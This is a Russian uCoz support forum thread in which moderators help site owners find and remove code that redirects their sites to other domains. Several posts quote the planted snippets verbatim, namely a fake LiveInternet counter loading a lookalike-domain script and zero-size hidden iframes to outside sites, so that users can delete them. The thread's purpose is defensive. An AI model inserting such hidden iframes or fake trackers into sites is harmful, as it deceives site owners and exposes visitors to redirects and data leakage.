| При заходе на сайт перекидывает на другой |
| webanet | Дата: Четверг, 02-Фев-2012, 22:42:16 | Сообщение # 1
|
LAX
Группа: Координаторы
Сообщений: 4319
Статус: отсутствует
| Описание проблемы:
При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом
 Причины возникновения: 1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки Если вы ставите к себе на сайт скрипт подобного вида Code <script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script> где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему http://forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность 2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой Code <iframe src="http://levyisite.ru" width="1" height="1"></iframe> Где levyisite.ru - это адрес чужого сайта а может иметь значения 0 что означает фоновую (скрытую)подгрузку, то это на 100% агрессивный вредоносный код Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме http://forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов 3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность 4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес
Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем
IE это такая программа, с помощью которой можно зайти на сайт www.mozilla,com и скачать себе браузер... http://webanet.ucoz.ru/
|
| |
| |
|
| bakar3730 | Дата: Понедельник, 20-Фев-2012, 23:43:21 | Сообщение # 31
|
|
Заглянувший
Группа: Проверенные
Сообщений: 8
Замечания:
Статус: отсутствует
| Теперь все стало работать вчера что то не заходил уменя сегодня тоже теперь все ок,спросил у некоторый пользователя сайта уних тоже не открывался вчера... Спасибо всем и тебе тоже Wvi2dam,
|
| |
| |
|
| Teplonebes | Дата: Пятница, 24-Фев-2012, 04:08:56 | Сообщение # 32
|
|
Заглянувший
Группа: Пользователи
Сообщений: 2
Замечания:
Статус: отсутствует
| в данной теме оказывается помощь только сайтам расположенным в системе uCoz
Сообщение отредактировал webanet - Пятница, 24-Фев-2012, 15:46:56 |
| |
| |
|
| Selena | Дата: Пятница, 24-Фев-2012, 15:44:10 | Сообщение # 33
|
* Первый помощник uCoz *
Группа: Администраторы
Сообщений: 7590
Статус: отсутствует
| Teplonebes, с немобильного не перекидывает. Возможно это намёк на то, что браузер надо обновить. То есть ПО мобильного "шутит".
В ЛС к администратору обращаются только с административными вопросами!
|
| |
| |
|
| Teplonebes | Дата: Пятница, 24-Фев-2012, 16:48:10 | Сообщение # 34
|
|
Заглянувший
Группа: Пользователи
Сообщений: 2
Замечания:
Статус: отсутствует
| Нет, с другими то сайтами не шутит,а только с одним..
|
| |
| |
|
| GrozaZool | Дата: Суббота, 03-Мар-2012, 15:23:26 | Сообщение # 35
|
Заглянувший
Группа: Пользователи
Сообщений: 3
Замечания:
Статус: отсутствует
| В фоновой вкладке открывается эта ссылка http://churl.biz/click/body.php?id=4&hash=fc3183f741afd2e27df0c1fd468b29c8 облазил всё... не нашёл, помогите найти где этот код спрятан
|
| |
| |
|
| webanet | Дата: Суббота, 03-Мар-2012, 15:26:30 | Сообщение # 36
|
|
LAX
Группа: Координаторы
Сообщений: 4319
Статус: отсутствует
| GrozaZool, адрес сайта дайте где наблюдается проблема
IE это такая программа, с помощью которой можно зайти на сайт www.mozilla,com и скачать себе браузер... http://webanet.ucoz.ru/
|
| |
| |
|
| GrozaZool | Дата: Суббота, 03-Мар-2012, 15:43:06 | Сообщение # 37
|
|
Заглянувший
Группа: Пользователи
Сообщений: 3
Замечания:
Статус: отсутствует
| упс) написать забыл... событие происходит на сайте http://isofter.ucoz.com/ - проверьте где на этом сайте расположен вредоносная ссылка Добавлено (03-Мар-2012, 15:38:27)
---------------------------------------------
webanet, http://isofter.ucoz.com Добавлено (03-Мар-2012, 15:43:06)
---------------------------------------------
я допустим зашёл через Хром в режиме инкогнито, кликнул на сайт например на статью эта чёртова реклама открывается...я её не ставил. там должно открыватся тока от advmaker и mediaunder - если что то из этого вреднокодит (это mediaunder может быть только) напишите где этот скрипт находится которые переводит... буду очень благодарен
|
| |
| |
|
| bandjuk | Дата: Суббота, 03-Мар-2012, 15:48:37 | Сообщение # 38
|
Capo di tutti capi
Группа: Продвинутые
Сообщений: 369
Статус: где-то тут
| GrozaZool, Аваст матерится на
http://counter.yadre.eu/hit.js
Nobody dies a virgin, life fucks us all. скрипты, обои на рабочий стол
Сообщение отредактировал bandjuk - Суббота, 03-Мар-2012, 15:50:09 |
| |
| |
|
| webanet | Дата: Суббота, 03-Мар-2012, 15:51:15 | Сообщение # 39
|
|
LAX
Группа: Координаторы
Сообщений: 4319
Статус: отсутствует
| GrozaZool, медиаундер находится в конце кода
Code <!-- mediaunder Start -->
<script type="text/javascript">
var ref = escape(document.referrer);
document.write('<scr' + 'ipt type="text/javascript" src="http://mediaunder.org/scode.php?site=5030&ref=' + ref + '"></scr' + 'ipt>')
</script>
<!-- mediaunder End -->
откройте шаблон страницы сайта в самом низу. там же реклама от http://am10.ru/
в верхней части сайта удалите вот это
</head>
Quote <!--LiveInternet counter--><script type="text/javascript">
document.write("<script type=\"text/javascript\" "+
"src='http://counter.yadre.eu/hit.js?t11.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"'><"+"/sc"+"ript>")
</script><!--/LiveInternet-->
фальшивку удалить обязательно! удалите и потом отпишитесь о результатх
IE это такая программа, с помощью которой можно зайти на сайт www.mozilla,com и скачать себе браузер... http://webanet.ucoz.ru/
|
| |
| |
|
| GrozaZool | Дата: Суббота, 03-Мар-2012, 16:23:49 | Сообщение # 40
|
|
Заглянувший
Группа: Пользователи
Сообщений: 3
Замечания:
Статус: отсутствует
| спасибо огромное bandjuk, и webanet, да да...это та самая ссылка...вот он зараза куда ссылку спрятал;) Добавлено (03-Мар-2012, 16:08:30)
---------------------------------------------
я зашёл на LiveInternet и хотел заново взять код. но там тот же самый код
[code]
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t11.10;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet-->
и он так же ведёт на сайт. мне что теперь статистику liveinternet удалить? Добавлено (03-Мар-2012, 16:16:12)
---------------------------------------------
не...ссылка выходит даже когда liveinternet убрал Добавлено (03-Мар-2012, 16:19:17)
---------------------------------------------
а да...у вверху и внизу был код... удалил Добавлено (03-Мар-2012, 16:23:49)
---------------------------------------------
Спасибо. Проблема решена. Зашёл на LiveInternet скопировал код заново.
Вверху убрал, и внизу тоже было и тоже убрал. Больше не выходит;)
Большое спасибо!!
|
| |
| |
|
| prizrak7707 | Дата: Понедельник, 02-Апр-2012, 16:43:48 | Сообщение # 41
|
|
Заглянувший
Группа: Пользователи
Сообщений: 3
Замечания:
Статус: отсутствует
| При заходе на сайт http://screensaver-wd.ucoz.ru меня перекидывает на другой сайт http://www.pro-evolution.ru/ под логином и под гостем
|
| |
| |
|
| bandjuk | Дата: Понедельник, 02-Апр-2012, 17:22:07 | Сообщение # 42
|
|
Capo di tutti capi
Группа: Продвинутые
Сообщений: 369
Статус: где-то тут
| prizrak7707, в блоке "Антивирус онлайн"
удали фрейм:
<iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"src="http://pro-evolution.ru/"></iframe>
|
| |
| |
|
| fflesh | Дата: Понедельник, 02-Апр-2012, 17:23:21 | Сообщение # 43
|
Завсегдатай
Группа: Модераторы
Сообщений: 1215
Статус: отсутствует
|
Вот это:
Найдите и удалите:
Quote <form method="POST" id="drweb_online_scan_form" enctype="multipart/form-data" action="http://online.drweb.com/result" target="drweb_scan_form_popup_window"> <div style="width: 190px; height: 105px; background: url(http://plusoft.ru/images/dr_web/fon_white.gif)"><div style="padding: 50px 10px 0 10px;"> <iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"src="http://pro-evolution.ru/"></iframe><div align="center"><input name="file" id="file_selection_input" type="file" size="15"></div> <div style="padding-top: 5px; text-align: center"><input type="image" onclick="return do_scan_file_01();" src="http://plusoft.ru/images/dr_web/button.gif" width="121" height="21"></div></div></div></form>
Заодно и вот это:
Quote <tr><td class="topBorder" style="padding:3px;" bgcolor="#F4F4F4"><!-- <bc> --><!-- Put this script tag to the <head> of your page --><a href="http://v-zakladki.ru/"> <a class="mrc__share" href="http://platform.mail.ru/share">В Мой Мир</a><script src="http://cdn.connect.mail.ru/js/share/2/share.js" type="text/javascript" charset="UTF-8"></script><br /><br /><script type="text/javascript" src="http://vkontakte.ru/js/api/share.js?9" charset="windows-1251"></script><!-- Put this script tag to the place, where the Share button will be --> <script type="text/javascript"><!-- document.write(VK.Share.button(false,{type: "round", text: "Сохранить"})); --></script><br /><script src="http://odnaknopka.ru/ok2.js" type="text/javascript"></script> </a><body style="margin:0px">
</iframe>
<iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"
src="http://www.24lux.ru/">
</iframe><script src="http://ucozon.ru/SCRIN2/guirlande.js"></script> <A title="Статусы" href="http://status-sotseti.ucoz.ru/" rel=sidebar onclick="window.external.addFavorite(location.href,'Афоризмы,цитаты,высказывания'); return false;"><img src="http://s002.radikal.ru/i197/1002/38/24471bf528a1.jpg" border="0" alt="" /></A> <!-- </bc> --></td></tr> <tr><td bgcolor="#E9ECF5"><img border="0" src="/.s/t/121/11.gif" width="190" height="21"></td></tr> </table> <div style="padding:3px"></div> <!-- </block1> -->
-1
Всё написанное выше - моё личное мнение и на абсолютную правоту не претендует. Есть вопросы лично ко мне - пиши сюда: http://likbezz.ru/forum/8
Сообщение отредактировал fflesh - Понедельник, 02-Апр-2012, 17:25:03 |
| |
| |
|
| prizrak7707 | Дата: Понедельник, 02-Апр-2012, 17:40:32 | Сообщение # 44
|
|
Заглянувший
Группа: Пользователи
Сообщений: 3
Замечания:
Статус: отсутствует
| Спасибо огромное...помогло!!! Теперь захожу)))) А как то можно предотвратить такое на будущее?
|
| |
| |
|
| fflesh | Дата: Понедельник, 02-Апр-2012, 17:43:00 | Сообщение # 45
|
|
Завсегдатай
Группа: Модераторы
Сообщений: 1215
Статус: отсутствует
| prizrak7707, Quote (prizrak7707) А как то можно предотвратить такое на будущее?
Не пихать в код всё подряд...
...
Всё написанное выше - моё личное мнение и на абсолютную правоту не претендует. Есть вопросы лично ко мне - пиши сюда: http://likbezz.ru/forum/8
Сообщение отредактировал fflesh - Понедельник, 02-Апр-2012, 17:43:16 |
| |
| |
